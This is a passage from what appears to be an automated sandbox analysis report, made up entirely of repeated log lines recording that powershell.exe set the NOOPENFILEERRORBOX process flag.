                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
